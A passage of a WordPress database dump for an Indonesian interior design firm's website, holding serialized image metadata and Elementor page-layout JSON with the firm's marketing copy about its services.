s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:27783;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:29:\"1695601950-picsay-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:10106;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:29:\"1695601950-picsay-768x768.png\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:107744;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:29:\"1695601950-picsay-768x660.png\";s:5:\"width\";i:768;s:6:\"height\";i:660;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:107458;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:29:\"1695601950-picsay-390x473.png\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:53664;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:29:\"1695601950-picsay-378x824.png\";s:5:\"width\";i:378;s:6:\"height\";i:824;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:65656;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:29:\"1695601950-picsay-900x473.png\";s:5:\"width\";i:900;s:6:\"height\";i:473;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:125527;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4425,4951,'_wp_attached_file','2023/09/cropped-1695601950-picsay.png'),(4426,4951,'_wp_attachment_context','site-icon'),(4427,4951,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"file\";s:37:\"2023/09/cropped-1695601950-picsay.png\";s:8:\"filesize\";i:61611;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:37:\"cropped-1695601950-picsay-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:29892;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:37:\"cropped-1695601950-picsay-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:10553;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:37:\"cropped-1695601950-picsay-390x473.png\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:57129;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:37:\"cropped-1695601950-picsay-378x512.png\";s:5:\"width\";i:378;s:6:\"height\";i:512;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:56404;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:37:\"cropped-1695601950-picsay-512x473.png\";s:5:\"width\";i:512;s:6:\"height\";i:473;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:62002;}s:13:\"site_icon-270\";a:5:{s:4:\"file\";s:37:\"cropped-1695601950-picsay-270x270.png\";s:5:\"width\";i:270;s:6:\"height\";i:270;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:25625;}s:13:\"site_icon-192\";a:5:{s:4:\"file\";s:37:\"cropped-1695601950-picsay-192x192.png\";s:5:\"width\";i:192;s:6:\"height\";i:192;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:15469;}s:13:\"site_icon-180\";a:5:{s:4:\"file\";s:37:\"cropped-1695601950-picsay-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:14179;}s:12:\"site_icon-32\";a:5:{s:4:\"file\";s:35:\"cropped-1695601950-picsay-32x32.png\";s:5:\"width\";i:32;s:6:\"height\";i:32;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:940;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4430,4952,'_wp_attached_file','2023/09/bahaus_logo.jpg'),(4431,4952,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:400;s:6:\"height\";i:376;s:4:\"file\";s:23:\"2023/09/bahaus_logo.jpg\";s:8:\"filesize\";i:44908;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"bahaus_logo-300x282.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:282;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17602;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"bahaus_logo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14591;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:23:\"bahaus_logo-390x376.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:376;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20467;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:23:\"bahaus_logo-378x376.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:376;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20431;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(4432,4953,'_wp_attached_file','2023/09/cropped-bahaus_logo.jpg'),(4433,4953,'_wp_attachment_context','site-icon'),(4434,4953,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"file\";s:31:\"2023/09/cropped-bahaus_logo.jpg\";s:8:\"filesize\";i:23199;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:31:\"cropped-bahaus_logo-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17679;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:31:\"cropped-bahaus_logo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14544;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:31:\"cropped-bahaus_logo-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21110;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:31:\"cropped-bahaus_logo-378x512.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21989;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:31:\"cropped-bahaus_logo-512x473.jpg\";s:5:\"width\";i:512;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23525;}s:13:\"site_icon-270\";a:5:{s:4:\"file\";s:31:\"cropped-bahaus_logo-270x270.jpg\";s:5:\"width\";i:270;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17015;}s:13:\"site_icon-192\";a:5:{s:4:\"file\";s:31:\"cropped-bahaus_logo-192x192.jpg\";s:5:\"width\";i:192;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15586;}s:13:\"site_icon-180\";a:5:{s:4:\"file\";s:31:\"cropped-bahaus_logo-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14967;}s:12:\"site_icon-32\";a:5:{s:4:\"file\";s:29:\"cropped-bahaus_logo-32x32.jpg\";s:5:\"width\";i:32;s:6:\"height\";i:32;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12689;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(4438,1,'_edit_lock','1695636475:3'),(4441,1,'_edit_last','3'),(4442,1,'ova_met_header_version','global'),(4443,1,'ova_met_footer_version','global'),(4444,1,'ova_met_main_layout','global'),(4445,1,'ova_met_wide_site','global'),(4446,1,'ova_met_embed_media',''),(4456,2432,'_edit_lock','1695638283:3'),(4457,2432,'footnotes',''),(4460,2432,'_edit_last','3'),(4463,2430,'_edit_lock','1695638324:3'),(4464,2430,'footnotes',''),(4467,2430,'_edit_last','3'),(4479,1090,'_edit_last','3'),(4480,1090,'_wp_page_template','default'),(4482,1090,'_edit_lock','1695638094:3'),(4483,1090,'footnotes',''),(4484,2430,'_wp_page_template','default'),(4487,2430,'_wp_old_date','2022-06-23'),(4488,2430,'rs_page_bg_color',''),(4491,1090,'_wp_old_date','2023-09-25'),(4492,1090,'rs_page_bg_color',''),(4493,2432,'_wp_page_template','default'),(4496,2432,'_wp_old_date','2022-06-23'),(4497,2432,'rs_page_bg_color',''),(4500,4969,'_wp_page_template','elementor_header_footer'),(4501,4969,'_elementor_edit_mode','builder'),(4502,4969,'_elementor_template_type','wp-page'),(4503,4969,'_elementor_version','3.8.1'),(4504,4969,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927c-scaled.jpg\",\"id\":4791,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]},\"image_width_template1_type2_no_border_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_template1_type2_no_border_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":-53},\"_offset_y_end_widescreen\":{\"size\":-100}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-1065.jpg\",\"id\":4787,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927.jpg\",\"id\":4788,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":114},\"_offset_y_end_widescreen\":{\"size\":-20}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-9402.jpg\",\"id\":4790,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"WELCOME TO BAUHAUS\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living!<\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.<\\/p><p>Kami tidak hanya menciptakan desain interior yang estetis, tetapi juga mengubah ruang tempat tinggal atau tempat kerja Anda menjadi cerminan karakter dan selera pribadi Anda.<\\/p><p>Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.<\\/p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\n interior design consultant & contractor \",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>- Konsultasi perencanaan &amp; interior design<\\/p><p>- Penyusunan Rencana Anggaran Belanja<\\/p><p>- Produksi furniture dan pekerjaan 